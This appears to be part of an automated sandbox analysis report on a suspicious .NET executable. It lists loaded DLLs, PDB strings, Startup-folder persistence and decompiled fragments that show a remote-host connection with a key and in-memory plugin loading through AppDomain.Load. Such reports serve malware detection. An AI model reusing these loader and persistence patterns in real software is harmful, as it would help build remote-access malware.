Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\KFPYr6f43H.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: KFPYr6f43H.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: KFPYr6f43H.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: KFPYr6f43H.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: Enalib.pdb source: WERFE95.tmp.dmp.13.dr
Source: Binary string: System.Xml.ni.pdb source: WERFE95.tmp.dmp.13.dr
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: KFPYr6f43H.exe, 00000000.00000002.3371109892.00000000087C3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Accessibility.pdb source: WERFE95.tmp.dmp.13.dr
Source: Binary string: System.ni.pdbRSDS source: WERFE95.tmp.dmp.13.dr
Source: Binary string: Microsoft.CSharp.pdb source: WERFE95.tmp.dmp.13.dr
Source: Binary string: System.Xml.pdbw source: WERFE95.tmp.dmp.13.dr
Source: Binary string: n0C:\Windows\mscorlib.pdb source: KFPYr6f43H.exe, 00000000.00000002.3378449271.000000000982A000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: System.Configuration.ni.pdb source: WERFE95.tmp.dmp.13.dr
Source: Binary string: mscorlib.ni.pdbRSDS source: WERFE95.tmp.dmp.13.dr
Source: Binary string: oC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: KFPYr6f43H.exe, 00000000.00000002.3378449271.000000000982A000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: System.Xml.pdb$ source: WERFE95.tmp.dmp.13.dr
Source: Binary string: System.Configuration.pdb source: WERFE95.tmp.dmp.13.dr
Source: Binary string: symbols\dll\mscorlib.pdbLb source: KFPYr6f43H.exe, 00000000.00000002.3378449271.000000000982A000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: System.Xml.pdb source: WERFE95.tmp.dmp.13.dr
Source: Binary string: o.pdb source: KFPYr6f43H.exe, 00000000.00000002.3378449271.000000000982A000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: System.pdb source: WERFE95.tmp.dmp.13.dr
Source: Binary string: System.Xml.ni.pdbRSDS# source: WERFE95.tmp.dmp.13.dr
Source: Binary string: System.pdbt^ source: WERFE95.tmp.dmp.13.dr
Source: Binary string: Microsoft.VisualBasic.pdb source: WERFE95.tmp.dmp.13.dr
Source: Binary string: System.Core.ni.pdb source: WERFE95.tmp.dmp.13.dr
Source: Binary string: C:\Users\Administrator\Desktop\2023CryptsDone\Document_26390\bin\Debug\Secured\Enalib.pdb source: KFPYr6f43H.exe, KFPYr6f43H.exe.2.dr
Source: Binary string: %%.pdb source: KFPYr6f43H.exe, 00000000.00000002.3378449271.000000000982A000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: System.Windows.Forms.pdb source: WERFE95.tmp.dmp.13.dr
Source: Binary string: mscorlib.pdb source: KFPYr6f43H.exe, 00000000.00000002.3352034906.0000000001662000.00000004.00000020.00020000.00000000.sdmp, WERFE95.tmp.dmp.13.dr
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: KFPYr6f43H.exe, 00000000.00000002.3376928032.00000000090D0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb[ source: KFPYr6f43H.exe, 00000000.00000002.3378449271.000000000982A000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb246122658-3693405117-2476756634-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: KFPYr6f43H.exe, 00000000.00000002.3352034906.00000000016CF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Dynamic.pdb source: WERFE95.tmp.dmp.13.dr
Source: Binary string: System.Management.pdb source: WERFE95.tmp.dmp.13.dr
Source: Binary string: System.Drawing.pdb source: WERFE95.tmp.dmp.13.dr
Source: Binary string: mscorlib.ni.pdb source: WERFE95.tmp.dmp.13.dr
Source: Binary string: Microsoft.CSharp.pdbMicrosoft.VisualBasic.dll@x source: WERFE95.tmp.dmp.13.dr
Source: Binary string: System.Configuration.pdbD source: WERFE95.tmp.dmp.13.dr
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb* source: KFPYr6f43H.exe, 00000000.00000002.3371109892.00000000087C3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: KFPYr6f43H.exe, 00000000.00000002.3352034906.00000000016E5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: WERFE95.tmp.dmp.13.dr
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbl source: KFPYr6f43H.exe, 00000000.00000002.3371109892.00000000087C3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Configuration.pdbH source: WERFE95.tmp.dmp.13.dr
Source: Binary string: System.Management.pdbH source: WERFE95.tmp.dmp.13.dr
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERFE95.tmp.dmp.13.dr
Source: Binary string: \??\C:\Windows\mscorlib.pdbB source: KFPYr6f43H.exe, 00000000.00000002.3352034906.00000000016E5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.ni.pdb source: WERFE95.tmp.dmp.13.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WERFE95.tmp.dmp.13.dr
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbH source: KFPYr6f43H.exe, 00000000.00000002.3376928032.00000000090D0000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Source: 7.2.KFPYr6f43H.exe.2c40674.0.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 7.2.KFPYr6f43H.exe.2c40674.0.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 7.2.KFPYr6f43H.exe.2c40674.0.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 7.2.KFPYr6f43H.exe.7d20000.3.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 7.2.KFPYr6f43H.exe.7d20000.3.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 7.2.KFPYr6f43H.exe.7d20000.3.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 7.2.KFPYr6f43H.exe.2c40674.0.raw.unpack, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
Source: 7.2.KFPYr6f43H.exe.2c40674.0.raw.unpack, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
Source: 7.2.KFPYr6f43H.exe.2c40674.0.raw.unpack, Messages.cs .Net Code: Memory
Source: 7.2.KFPYr6f43H.exe.7d20000.3.raw.unpack, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
Source: 7.2.KFPYr6f43H.exe.7d20000.3.raw.unpack, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
Source: 7.2.KFPYr6f43H.exe.7d20000.3.raw.unpack, Messages.cs .Net Code: Memory
Source: KFPYr6f43H.exe Static PE information: 0xE66E2199 [Fri Jul 4 02:34:01 2092 UTC]
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Code function: 0_2_0187DF60 push CC056ED0h; iretd 0_2_0187DF65
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Code function: 0_2_05D0E7CD push eax; iretd 0_2_05D0E7D0
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Code function: 0_2_05D0E7F2 push eax; iretd 0_2_05D0E7F5
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Code function: 0_2_05D0E783 push eax; iretd 0_2_05D0E786
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Code function: 0_2_05D0E7A8 push eax; iretd 0_2_05D0E7AB
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Code function: 0_2_05D0E75B push eax; iretd 0_2_05D0E75E
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Code function: 0_2_05D0F6C1 push 2C078B3Eh; iretd 0_2_05D0F6CD
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Code function: 0_2_05D0E9D0 push eax; iretd 0_2_05D0E9D3
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Code function: 0_2_05D0E9F5 push eax; iretd 0_2_05D0E9F8
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Code function: 0_2_05D0E986 push eax; iretd 0_2_05D0E989
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Code function: 0_2_05D0E9AB push eax; iretd 0_2_05D0E9AE
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Code function: 0_2_05D0E961 push eax; iretd 0_2_05D0E964
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Code function: 0_2_05D0E917 push eax; iretd 0_2_05D0E91A
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Code function: 0_2_05D0491E push es; iretd 0_2_05D04925
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Code function: 0_2_05D0E93C push eax; iretd 0_2_05D0E93F
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Code function: 0_2_05D0E8CE push eax; iretd 0_2_05D0E8D1
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Code function: 0_2_05D0E8F3 push eax; iretd 0_2_05D0E8F6
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Code function: 0_2_05D0E885 push eax; iretd 0_2_05D0E888
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Code function: 0_2_05D0E8AA push eax; iretd 0_2_05D0E8AD
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Code function: 0_2_05D0E860 push eax; iretd 0_2_05D0E863
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Code function: 0_2_05D0E817 push eax; iretd 0_2_05D0E81A
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Code function: 0_2_05D0E83C push eax; iretd 0_2_05D0E83F
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Code function: 0_2_05D0EB8B push eax; iretd 0_2_05D0EB8E
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Code function: 0_2_05D0EBB0 push eax; iretd 0_2_05D0EBB3
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Code function: 0_2_05D0EB41 push eax; iretd 0_2_05D0EB44
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Code function: 0_2_05D0EB66 push eax; iretd 0_2_05D0EB69
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Code function: 0_2_05D0EB1C push eax; iretd 0_2_05D0EB1F
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Code function: 0_2_05D0EAD2 push eax; iretd 0_2_05D0EAD5
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Code function: 0_2_05D0EAF7 push eax; iretd 0_2_05D0EAFA
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Code function: 0_2_05D0EA88 push eax; iretd 0_2_05D0EA8B
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Code function: 0_2_05D0EAAD push eax; iretd 0_2_05D0EAB0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Jump to dropped file

Boot Survival

barindex
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe\:Zone.Identifier:$DATA Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
